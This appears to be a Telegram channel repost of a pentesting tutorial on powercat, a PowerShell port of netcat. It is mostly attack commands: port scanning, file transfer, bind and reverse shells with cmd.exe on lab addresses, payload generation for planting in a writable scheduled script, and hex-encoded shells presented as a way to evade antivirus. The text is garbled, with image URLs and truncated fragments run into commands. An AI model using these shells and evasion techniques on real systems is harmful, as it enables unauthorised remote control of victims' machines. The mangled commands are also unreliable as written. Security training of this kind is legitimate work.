Hacking Articles Tips Tricks Videos Tutorials
471 subscribers
66K photos
15 videos
157 files
132K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking Articles|Raj Chandel's Blog
Powercat for Pentester

IntroductionPowercat is a simple network utility used to perform low level network communication operations. The tool is an implementation of the well-known netcat in powershell. Traditional anti-viruses are known to allow powercat to execute. The installed size of the utility is 68 KB. The portability and platform-independence of the tool makes it an important arrow in every red teamer’s quiver. In this article, we’ll demonstrate and learn the functionality of this tool. You can download this here.Table of Content· Basic Options in PowercatBasic Options in Powercat-gGenerate Payload-geGenerate Encoded Payload-dDisconnect stream-iInput dataSetting up Powercatpowershell -ep bypass -o powercat.ps1 https://blogger.googleusercontent.com/img/a/AVvXsEjzkXG95vA2Ywgg5SyjXA9-PbORrbYjRQRqET65caR3KOWtyYuK29nCIuVGebF57N752DPLZKRcOtwLEJgL8W3XfwBC1oYzLUGl7dhPDYBn9keR5fxsT6IJNPduQwByPx3fB0chsBaRS6ltepiMPAXBHYzUPYFE4CtEmlzSHezXS31GSrQvcjbzn2v0kA=s16000 Now that we have downloaded the powercat script, we can import it into the current powershell terminal and then it could be used.Import-Module .\powercat.ps1https://blogger.googleusercontent.com/img/a/AVvXsEgvgfawFNdCqKeJNM7FMLwNC5kD976yxhChkrgri0KHQNyYH0xwI_jVqm39QUTNGxOkeYrdYG9LHn_ZsB8LuLZWDFIVkhp2iSFFvbvGPSFa8p5sKAIHUqwCJFAJYZIoJ50XPwk1rSAhnCOnKmKpFBRM3YMAFWcY2uHlFJ98I2aHFsx6mLR-Kst7J3SaoA=s16000 Port Scanning(21,22,80,443) | % {powercat -c 192.168.1.150 -p $_ -t 1 -Verbose -d}Note that here, we have appended port number as a list variable. The client mode (-c flag) specifies the client to scan. As we can observe in the screenshot below that if the port was found to be open, powercat successfully set up a stream with the service. the disconnect option (-d) flag specifies powercat to disconnect the stream as soon as it gets open. Hence, this is how open ports can be discovered using powercat.File TransferFile transfer is possible in powercat by data input in t[...]

___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Hacking Articles|Raj Chandel's Blog Powercat for Pentester IntroductionPowercat is a simple network utility used to perform low level network communication operations. The tool is an implementation of the well-known netcat in powershell. Traditional anti…
he data stream and fetching it at the client end.nc -lnvp 443 > notes.txt -p 443 -i notes.txtBind Shell Powercat Netcat on Kalinc -lvvp 443 -p 443 -e cmd.exehttps://blogger.googleusercontent.com/img/a/AVvXsEjNU_qRphs627OypFR4n3Aa44idOovfGZrC8sjwHBGHFyhMvwHNvTLfhwMGvRQllq-VreAUeY3kahHddnvUDO7FJ8jkYnPGxfOivwNiwZDgZDLJCrYRQtr0gE9zT3S3lGGTMziL-iVTJ-VPeF4pbMGKQr97Hdkq1gqzxUx99HOa7oWyrHXyLXTDhs69-Q=s16000 And thus, we observe that the “cmd” executable indeed gets executed on the victim’s machine.powercat -l -p 9000 -e cmd -v -p 9000 -v And as you can see, victim’s machine has processed the executable delivered by the attacker.Reverse ShellReverse shell refers to the process in which the attacker machine has a listener running to which the victim connects and then attacker executes code. Here, Windows (powercat) is the attacker machine with listener running on port 443 and Kali running netcat (victim) shall connect to it. This is achieved by running powercat in listener mode:powercat -l -p 443 -e cmdhttps://blogger.googleusercontent.com/img/a/AVvXsEhT7JVCtDvyFeOhYlEpZCjCG80M4lmln5VeaL9gfNMjkD7UySnOhhq4kT1ISZE_rMxVdReNIbDOPUiz7wvbSnb__V9SpqaHBszUoWFJ6MYLPS2r8MGEIGSPxSZnxZG8j[...]

___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
he data stream and fetching it at the client end.nc -lnvp 443 > notes.txt -p 443 -i notes.txtBind Shell Powercat Netcat on Kalinc -lvvp 443 -p 443 -e cmd.exehttps://blogger.googleusercontent.com/img/a/AVvXsEjNU_qRphs627OypFR4n3Aa44idOovfGZrC8sjwHBGHFyhMvw…
jxQEGFokC_2_bQJae0L_IdIpO6uG1ac9QLV7yQmgH22r1jkmOxxx3Nyi5c5rA=s16000 As you can see, as soon as we connect to the listener, we get a shellnc 192.168.1.145 443https://blogger.googleusercontent.com/img/a/AVvXsEieW19okCMnGK19qmAIlM7L7Yik9zTFZLBFmKLkpP7EMfUoFbIbzDs6IP_EeOYWJeCoiZ2s1bp60eqxSS0ldkyRMh_0NlXFHp7yb2ZeBdBh3Mf2mj8bsdrrNdyFjcpsH2wltZK766aVMbJVNtkSrc5fh3ABMppyJUO9UKbsaPQ5-g2VfcfKHBzGv1DdyA=s16000 The same can be done with two Windows devices too. Let’s set up a listener on port 9000.powercat -l -p 9000 -e cmd -vhttps://blogger.googleusercontent.com/img/a/AVvXsEgoLx0fMloh5qxDasdbvRVBPNfPhgmiupNeY6x3OHMC3-w0p9kj1N8QqkRmtvQ6Wf-lIs1wVwNR_Lp_WfPpNyZQ7HVA7StJKRn9j1qOnkln9Va4lVKYAtkTdziANTuHSLClaoQW1jAG-1BoxpfLpCsW3xrjrfEtOVpl0vgxA-bgfOiVani5PA621P6jOg=s16000 Now, we’ll use powercat to connect to this listener with the command:powercat -c 192.168.1.145 -p 9000 -v Standalone shellThe option is useful for when a script can be executed in the system. This allows an attacker to code a reverse shell in a “.ps1” file and wait for the script to be executed. Scenario 1: Let’s say a cron job is running that executes a script that has write access. One can copy paste the following command to get reverse shell easily even with no powershell command execution access.powercat -c 192.168.1.3 -p 443 -e cmd.exe -g > shell.ps1https://blogger.googleusercontent.com/img/a/AVvXsEifTWZKtIyUTLCxhjXJ3jmfTavcPIVyjccVUjmy60hP8RlPyJlHRItKJGlNXx7JOgbfRX_T_2h30cMDn9KTnsWT6D46T_pLzPJDTfcKan9_XBydcHjrYOwZk14WMikzsrYma5qZ8NU3zNnrDsYw4UMvsc8Q2AsSYPlLWvN_ED4Ttod3jH3PbmHFDi98Bg=s16000 Make sure the listener is running. We are using Kali as an attacker machine using netcat.nc -lnvp 443 As you can see, there are multiple ways to get an interactive shell on the target machine using netcat.Encoded ShellTo evade traditional security devices like Anti-Virus solutions, we can encode the shell that we used above. Powercat has a good feature to encode a command to Hexadecimal Array. This way, some of the basic security features can be bypassed. This is done by:powercat -c 192.168.1.3 -p 443 -e cmd.exe -ge > encodedshell.ps1 And then the shell can be run by using the Powershell -E option which can execute an encoded string.powershell -E The string is the encoded value from above.___________________________
@hacking_Attack
@Hacking_Video